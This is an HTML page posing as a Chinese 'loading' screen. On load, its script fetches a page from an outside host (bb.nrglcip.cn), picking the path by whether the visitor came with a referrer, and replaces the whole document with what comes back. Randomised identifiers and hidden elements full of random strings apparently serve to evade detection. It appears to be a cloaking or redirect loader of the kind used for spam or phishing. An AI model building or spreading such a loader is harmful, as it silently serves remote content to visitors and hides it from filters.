<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .unD5MQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .unD5MQ .sqsxSzC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .unD5MQ .content {
            line-height: 50px;
            text-align: center
        }

        .unD5MQ .img {
            width: 100%
        }

        .unD5MQ .c3OhAGNeKux {
            text-align: center
        }

        .unD5MQ .c3OhAGNeKux span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .unD5MQ .c3OhAGNeKux span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .unD5MQ .c3OhAGNeKux span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .unD5MQ .c3OhAGNeKux span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .unD5MQ .c3OhAGNeKux span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .unD5MQ .c3OhAGNeKux span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .unD5MQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function urAl5TtZGA(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Mh7wQ = urAl5TtZGA('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Mh7wQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Mh7wQ +".html?a=share";
		}
		
        AZ41n6fxY=url+"#"+new Date().getTime();
        AZ41n6fxY && function() {
            $.get(AZ41n6fxY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >ruHGw7RnrAAMtEpkXT3tD23ZIuJN6s0uzb0C3Kq7S5Fu9DN3aq0Xs1NEEWNdmKSSgZlUPy1m</li>
<a  href='#' style='display:none'>NunYXqOxpewjvIHhkaNlZxctnb1IB8GirpMa8r</a>
<h1 style='display:none' >Z0FvvSLYriY36kSYi2tsqulgt6hhYAWTs7eVWDH5cvyzafexAxd5HB75Hk</h1>
<span style='display:none'>Gb1rrKkggmjdSkFlOueLGrt3j5rmqcyTfXMYGSnPL6n6</span>
<div style='display:none'>DUS3XGiVbo0hX9wREQzX96e5JXd9oN00n8Lo55scQpIr9NahZJGgDKoj4WrXlzzNpzKVqkABU3xb1tJItRSpVHHKaj8</div>
<h1 style='display:none' >Z0FvvSLYriY36kSYi2tsqulgt6hhYAWTs7eVWDH5cvyzafexAxd5HB75Hk</h1>
<h1 style='display:none' >Z0FvvSLYriY36kSYi2tsqulgt6hhYAWTs7eVWDH5cvyzafexAxd5HB75Hk</h1>
<img  src='' style='display:none'>
<ul style='display:none' >TPHllEqRW3pFa69arOAG1j8bITvY58wln</ul><div class="unD5MQ">
    <div class="sqsxSzC">
        <div class="c3OhAGNeKux">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >dtllb8pGoQzL0fcxhWA1pKRoZsHAl2L6qw4ZRuj8pINhODEkG0</li>
<b style='display:none' >OycxrvV5oBCm8zDCgUIdBHKktUxymFmXBYEUJ4tUb6o1JGAzkUx9ugJUHKS64GPG7UF9nkyDOcY</b>
<p  style='display:none'>S2mDt4V9eSs75FkUc</p>
<h1 style='display:none' >NoO020fAkhQfSOkOj0sHgaH6hsjDeF4Jbvas6ZMPtIAPpQ</h1>
<div style='display:none'>ytlatcEjAF9uc5aPiN3waXUw1Pn0i9EjU9DUeOlwtLQgruYH9I1fqQqzq67oDt5KurFpt37</div>
<p  style='display:none'>S2mDt4V9eSs75FkUc</p>
<li style='display:none' >dtllb8pGoQzL0fcxhWA1pKRoZsHAl2L6qw4ZRuj8pINhODEkG0</li></body>
</html>